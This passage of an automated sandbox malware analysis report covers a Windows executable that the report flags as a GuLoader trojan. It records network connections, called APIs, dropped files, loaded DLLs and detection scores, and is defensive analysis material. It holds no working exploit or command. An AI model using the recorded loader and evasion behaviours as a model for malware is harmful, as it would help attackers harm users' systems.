00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006EAC000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49792 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49798 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49802 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49811 version: TLS 1.2
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_70051A980_2_70051A98
      Source: fbXZ4ErQMU.exeStatic PE information: invalid certificate
      Source: fbXZ4ErQMU.exe, 00000000.00000000.51418181320.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs fbXZ4ErQMU.exe
      Source: fbXZ4ErQMU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeFile created: C:\Users\user\AppData\Local\Temp\nsvDC99.tmpJump to behavior
      Source: fbXZ4ErQMU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: fbXZ4ErQMU.exeReversingLabs: Detection: 60%
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeFile read: C:\Users\user\Desktop\fbXZ4ErQMU.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\fbXZ4ErQMU.exe "C:\Users\user\Desktop\fbXZ4ErQMU.exe"
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess created: C:\Users\user\Desktop\fbXZ4ErQMU.exe "C:\Users\user\Desktop\fbXZ4ErQMU.exe"
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess created: C:\Users\user\Desktop\fbXZ4ErQMU.exe "C:\Users\user\Desktop\fbXZ4ErQMU.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.0.drLNK file: ..\Users\user\Disannex.And37
      Source: fbXZ4ErQMU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000003.00000002.56492873526.000000000183F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.53292835357.0000000002C0F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_70051A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70051A98
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_70052F60 push eax; ret 0_2_70052F8E
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeFile created: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
